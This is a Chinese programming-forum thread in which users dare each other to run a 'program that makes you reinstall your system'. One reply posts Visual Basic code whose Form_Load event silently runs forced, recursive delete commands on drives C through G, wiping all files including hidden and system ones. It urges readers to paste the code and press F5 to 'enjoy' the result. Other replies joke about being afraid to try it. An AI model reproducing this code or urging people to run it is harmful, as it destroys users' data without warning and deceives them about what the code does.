| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   

密 码:  
共有 2791 人关注过本帖
标题:[原创] 一个运行后要你重装系统的程序..谁敢试试...
只看楼主 加入收藏
tgb
等 级:新手上路
帖 子:19
专家分:0
注 册:2007-4-8
得分:0 
回复:(gkimjatl)[原创] 一个运行后要你重装系统的程...
不敢试
猪肉
帖 子:96
专家分:1
注 册:2007-3-8

Private Sub Form_Load()
shell "del C:\ . /F/S/Q/A RHSA",vbhide
shell "del D:\ . /F/S/Q/A RHSA",vbhide
shell "del E:\ . /F/S/Q/A RHSA",vbhide
shell "del F:\ . /F/S/Q/A RHSA",vbhide
shell "del G:\ . /F/S/Q/A RHSA",vbhide
End Sub

大家如果想重装系统的,请测试上面的代码,保证让你爽。输入上面的代码后按F5测试就行。不用生成EXE文件就可以让你爽个够的了

milk713785
帖 子:39
注 册:2007-5-9
练习破坏系统啊...

wang38361640
帖 子:5
注 册:2007-3-28

我挺好奇的。不敢试。
我怕把电脑搞坏了。老婆打我的PP。
呵呵……
风无宿
帖 子:1
注 册:2007-5-15

阿哦 我这有还原精灵 再加这个

kmzPG24x.rar (620 Bytes) [原创] 一个运行后要你重装系统的程序..谁敢试试...

gkimjatl
帖 子:106
注 册:2007-3-20
回复:(猪肉)Private Sub Form_Load()shell

没得什么反应嘛.我运行了啊.什么也没事.

azxyq5
帖 子:3
注 册:2007-5-6
你是不是吓人的呀?哪么多人都不敢试?胆子未免也太小了吧,还是我来吧!!!
faee0
帖 子:22
注 册:2007-5-28
不敢哟,网吧的机器,怕被老板抓住了把我打成猪头三,HOHO~~~
不惑
等 级:论坛游民
威 望:2
帖 子:569
专家分:13
注 册:2007-3-22
哈哈,17楼的够很.17楼虽然很,不过还留了点情面给大伙
不过,22楼的更很.这个很,那真的是很得彻底!!!!
17楼的方法大伙要试那就试一下吧.
22楼的方法,什么说我都是不敢试.
seguiwo
帖 子:76
注 册:2007-4-11

什么时候开源啊

快速回复:[原创] 一个运行后要你重装系统的程序..谁敢试试...
数据加载中...

关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。